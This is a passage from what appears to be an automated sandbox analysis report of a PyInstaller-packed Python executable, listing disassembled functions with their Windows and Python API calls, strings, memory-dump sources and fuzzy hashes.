                                                                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB35C
                                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB377
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                                                                      • Instruction ID: c2785f4d0c6c6e77735e094ba26bb851b6f48a53924aa4012a7835b23b76f85b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F118E22B0C64282FB957721DD5337D914AAF497B0F804736DC2E477D6DEBDA4114322
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _Py_NewReference.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8700D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8E768: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8E782
                                                                                                                                                                                                                                                                                      • _Py_NewReference.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8703A
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E87045
                                                                                                                                                                                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8705E
                                                                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E87076
                                                                                                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8709A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DescriptorReferenceSecurityfreemalloc$DeallocInitializeLength
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2040291429-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5a263e4a360b5c9879a8c6137d038cbb60ca2fb05632f21eee30b9500df43a29
                                                                                                                                                                                                                                                                                      • Instruction ID: a56b3658095ccdae42b00b8412d7218b37c3b42c1d4c090c8215f283ba5d8f8f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a263e4a360b5c9879a8c6137d038cbb60ca2fb05632f21eee30b9500df43a29
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E211432A09B4692EB048F99E85422D73A4FF48FC4F844038DB5D43BA5EF3DE5648340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeallocValue$DeleteFreeLocalState_Thread
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1066789969-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d72e0d609fdda2483786e1d5aaac3537aadc1cecc1d2818175353a1866a79386
                                                                                                                                                                                                                                                                                      • Instruction ID: 8841c8952ae80b6140f02f1511fa8df327008adb9ef9d17e389664d838adfada
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d72e0d609fdda2483786e1d5aaac3537aadc1cecc1d2818175353a1866a79386
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E11933990EB0682FB598F6DA85413C23B0AF49FD1F684174DB0E463B1CE3DA8959711
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 54c640665c14ceb6c072caddbdcc2b4df747597f7b34f72176d4332f90c746b2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E31E222B1868156E721B765AC423E7A299BF887D4F804133FE8D93759EFBCD146C321
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                                      • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                                                      • Instruction ID: aa0dff722b30b4cfb83da9bd7c0b966bfee5cc2ab23a599afea3be46d430aeed
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE315222B19A8249EB21EB21EC562F9A364FF88788F844137EA4D47B59DF7CD105C712
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7E12C918F,?,00007FF7E12C3C55), ref: 00007FF7E12C2BA0
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF7E12C2C2A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                      • Instruction ID: 61fa9ac32d8e62258f04e4c59ce8d764f5ec8c28df1fdfa070871f73a747d3e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21B262B08B4182E711AB14F8467EAB3A8FB88780F804137EE8D97759DF7CD215C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7E12C1B99), ref: 00007FF7E12C2760
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                      • Instruction ID: f0cc6981874ae1e4e83bbbda7f8231ba2ce14cdd7852a331e847ba866ec1225f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97217F72B1878182E721AB51B8827EAA298BB88384F804137FE8D93659DFBCD155C751
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_DescriptorInitializeParseSecurityTuple
                                                                                                                                                                                                                                                                                      • String ID: :Initialize$InitializeSecurityDescriptor
                                                                                                                                                                                                                                                                                      • API String ID: 3008588735-475701968
                                                                                                                                                                                                                                                                                      • Opcode ID: bcb71fab1ef2345fa760387ba95d939ceb0289144ad845e36b1c36082859699f
                                                                                                                                                                                                                                                                                      • Instruction ID: afe1938795dc9d6076904039ebe5a961cb6a5f7f06c3a0dc283b2dd61493587a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcb71fab1ef2345fa760387ba95d939ceb0289144ad845e36b1c36082859699f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36210022B1874182FB548B6AA54027E63A1EF49FC4F985035EB5D97B69DF3CE8518700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharDeallocFromObject_PrintUnicode_Widewsprintf
                                                                                                                                                                                                                                                                                      • String ID: <%hs at %Id (%Id)>
                                                                                                                                                                                                                                                                                      • API String ID: 2754229576-3200932714
                                                                                                                                                                                                                                                                                      • Opcode ID: d6e00180c53ce781e79f886e838ef22ec9f51abfd2b976ddd751f53c605734fa
                                                                                                                                                                                                                                                                                      • Instruction ID: a53bf859c432f04680085164e6232bea6edb4b510b70311481ac3bde0a5a3ca9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e00180c53ce781e79f886e838ef22ec9f51abfd2b976ddd751f53c605734fa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5117963B19B8991EB508B69E8047AD63A0EF88FE4F844231DA1E437B5EE3CD449C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                                                      • String ID: The object is not a PyHANDLE object$|O:HANDLERegistry
                                                                                                                                                                                                                                                                                      • API String ID: 709158290-3143913545
                                                                                                                                                                                                                                                                                      • Opcode ID: c51ad50cdd8a4e81500241ab1d12deaa1fc53d1bb5ae0f20817fe087472034bc
                                                                                                                                                                                                                                                                                      • Instruction ID: d97a171480159607a8cbbe4d8e079294ed682b53e7d306967963930312a7559c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c51ad50cdd8a4e81500241ab1d12deaa1fc53d1bb5ae0f20817fe087472034bc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA210A22A18B42D1EB408B59F58006D6374FF84BC4F945032EB4D47675EF3CE9A5C740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Arg_ParseReferenceTuple
                                                                                                                                                                                                                                                                                      • String ID: The object is not a PyHANDLE object$|O:HANDLE
                                                                                                                                                                                                                                                                                      • API String ID: 709158290-2911939918
                                                                                                                                                                                                                                                                                      • Opcode ID: d524b3afff0263af5fd17325481d8d0d46617f7d59757ba0433345372724a13d
                                                                                                                                                                                                                                                                                      • Instruction ID: a12b243bb34611a41ab977e9e93ca7a0b50badfa978ca5e379cae3ecf5ccbd9e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d524b3afff0263af5fd17325481d8d0d46617f7d59757ba0433345372724a13d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF21E922A18B4292EB509B59F88007D63B4FF84BC4F945032EB4E47675EF3DE9A5C780
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$Arg_DateFileParseTuple
                                                                                                                                                                                                                                                                                      • String ID: DosDateTimeToFileTime$FileTimeToSystemTime
                                                                                                                                                                                                                                                                                      • API String ID: 1545533762-3006328108
                                                                                                                                                                                                                                                                                      • Opcode ID: 6a8d318ddad729e7252b3c6980ed207a389d14d8fbb48f996d8d5cf78618f2e3
                                                                                                                                                                                                                                                                                      • Instruction ID: 653323b398d754e7b3e1e763c7de489ed1b47b77ab512678a0cde37479a0cf60
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a8d318ddad729e7252b3c6980ed207a389d14d8fbb48f996d8d5cf78618f2e3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76113352A08A4291FA90EB69E8521BE73A1FFC5FC8FC40072E74E465B6EE3CD5058B00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_Formatmemcpyrealloc
                                                                                                                                                                                                                                                                                      • String ID: SetACL: Unable to reallocate ACL to size %d
                                                                                                                                                                                                                                                                                      • API String ID: 2667793433-1849531889
                                                                                                                                                                                                                                                                                      • Opcode ID: 6ba060cef578a0feeb06df177a6597eb8244b50008ebb1effcf474d1aa7c220c
                                                                                                                                                                                                                                                                                      • Instruction ID: 14741341ec8dcf2588e9ea289d47096603d912919dcf90284228e4a428dd6bf4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ba060cef578a0feeb06df177a6597eb8244b50008ebb1effcf474d1aa7c220c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F110A66B19B5182EA149B5AE84507EB3A0FF48FC0F448439EB5D4BB66DF3CE4918344
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                                                                                                      • String ID: Object must be a PyDEVMODEW$PyDEVMODE cannot be None in this context
                                                                                                                                                                                                                                                                                      • API String ID: 1450464846-2899910425
                                                                                                                                                                                                                                                                                      • Opcode ID: 3c20b954deb9a9200817a31d63ae06041e07210914048fb5353322c95aff8119
